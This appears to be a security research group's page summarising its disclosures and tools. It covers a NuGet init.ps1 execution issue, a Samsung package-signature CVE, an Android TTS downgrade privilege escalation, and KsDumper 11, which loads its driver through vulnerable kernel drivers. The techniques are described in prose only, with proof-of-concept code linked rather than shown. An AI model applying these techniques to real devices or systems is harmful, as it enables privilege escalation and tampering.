Our Research

"Auto11" - A Prototype Windows In-place upgrade tool - (Dennis nedry - 2024)

Stobaugh Group Researcher, Dainen Dunn is back at it again, this time with a tool that makes doing In-place upgrades (even to an insider release) in Windows 11 a breeze.

 
Auto11 -- Github Link

 --Dennis Nedry

Microsoft Visual Studio Nuget RCE - (Dennis Nedry - 2024)

Stobaugh Group Researcher, Dainen Dunn discovered a vulnerability in the Nuget package manager that allows threat actors to infect Nuget packages. The way this is done is by leveraging the init.ps1 feature. There are people actively exploiting this in the wild, and thousands of users have downloaded infected packages.

Upon installing an infected package, the script will execute. But only if this is the first time installing the infected package since opening the project/solution. Subsequent installs will not execute the script.

Any version of Visual Studio from 2017 onward is affected by this issue, and potentially 2015 as well. The exact line of code that produces the result is linked below. Removing this line will prevent the package manager from executing the script. The infected packages can be installed with no worry.


Nuget RCE PoC -- Github 

 --Dennis Nedry

CVE 2023-30731 "combo-kill" (K0mraid - 2023)


 CVE-2023-30731 is a critical vulnerability in Samsung's Android operating system discovered by researcher, Cody "K0mraid" Stobaugh. This vulnerability allows a physical attacker to install an application with a different build type than the device is currently running. This allows an attacker to install malicious packages that could lead to local root access on the device, sensitive data exposure, keylogging, hidden call recording, and control of the device at a firmware level that is typically only accessible to engineers or development devices.

This was validated with the installation of non-production packages, done by exploiting a vulnerability that exists on Samsung Android devices pre-2024 in the context of how they handle package installations and package signatures. The vulnerability itself lies in one of Samsungs proprietary security control systems, AASA/ASKS.

Samsung has released a patch for the vulnerability in the October 2023 security maintenance release.

Links
Samsung Security Blog
NVD

 --K0mraid

KsDumper 11 (2023) - (Dennis Nedry - 2023)

KsDumper has been a game-changer for reverse engineers since its inception on GitHub. Its primary goal was to facilitate the process of dumping a running program from the memory to the disk in its entirety. However, with the patching of the exploit that was used to load the KsDumper driver, the program became incompatible with most currently updated systems, leaving many users stuck with outdated software.

This is where KsDumper 11 comes in.  Stobaugh Group's Dainen Dunn has replaced the patched capcom exploit used in the original KsDumper with a new project called Kernel Driver Utility (KDU). KDU exploits vulnerabilities in various kernel drivers to load the KsDumper driver, resulting in improved compatibility with updated systems, including Windows 11.

With KsDumper 11, users can now unload the driver without the need to restart their computer. Additionally, the .NET client app has undergone a complete UI makeover, with a sleek and customizable WinForms dark mode. The app also features new functions such as auto-refresh and auto-dump of a selected .exe file, as well as the ability to suspend, resume, and kill selected processes with just a right-click.

Active development is ongoing to address challenges that KsDumper 11 may present, such as edge cases where it may be unable to load the driver with KDU. Dainen's top priority was to ensure compatibility with a wide range of systems. Dainen welcomes feedback from users, and has created a Discord server linked to the GitHub repo for users to share their thoughts and suggestions.

At its core, KsDumper 11 is a cutting-edge solution that aims to make the process of dumping running programs simpler and more accessible for reverse engineers.

Links

Ks Dumper 11 GitHub Repo

--Dennis Nedry

AOSP "Package-Manager" Flaw aka "system shell" (K0mraid - 2022)


Way back in 2019, a vulnerability that would come to be known as "CVE-2019-16253" was found that affect Samsung's TTS engine in versions prior to 3.0.02.7. This exploit allowed for a local attacker to escalate privileges to system privileges and was later patched by Samsung.

Essentially, Samsung's TTS app would blindly accept any data that it received from the TTS engine. You can pass the TTS engine a library that will then be given to the TTS application, which in turn will then load that library and execute it with system privileges, UID 1000 on Android. This was later patched so that the TTS app would verify the data coming from the engine, and the version installed, closing this particular loophole.

However, with Android 10, Google introduced the ability to rollback an application by installing it with the ENABLE_ROLLBACK parameter. This allows the user to revert a version of an app installed on the device to a previous version of the app installed on the device. I believe an oversight has allowed this to extend to Samsung's text-to-speech application, as well as any application on any Android 10+ device currently in the wild.

The root of this kill-chain all comes back to the '-d' flag added to the package-manager command when installing an application. It should only work for debuggable apps, but it works for non-debuggable applications as well and that is why the TTS app can be downgraded forcefully.

In other words, while the exploit in 2019 was fixed and an updated version of the TTS app was distributed, first one, now multiple workarounds & bypasses to install and exploit it on devices released three (and perhaps four) years later have been discovered, leading to questions on how many past exploits are revivable. 

In March, Samsung released a patch for the exploit, however, I was able to quickly find a workaround for the March Samsung patch and this has since been reported and patched, as well, concluding the 2 year saga of the infamous "TTS System Shell"

 --K0mraid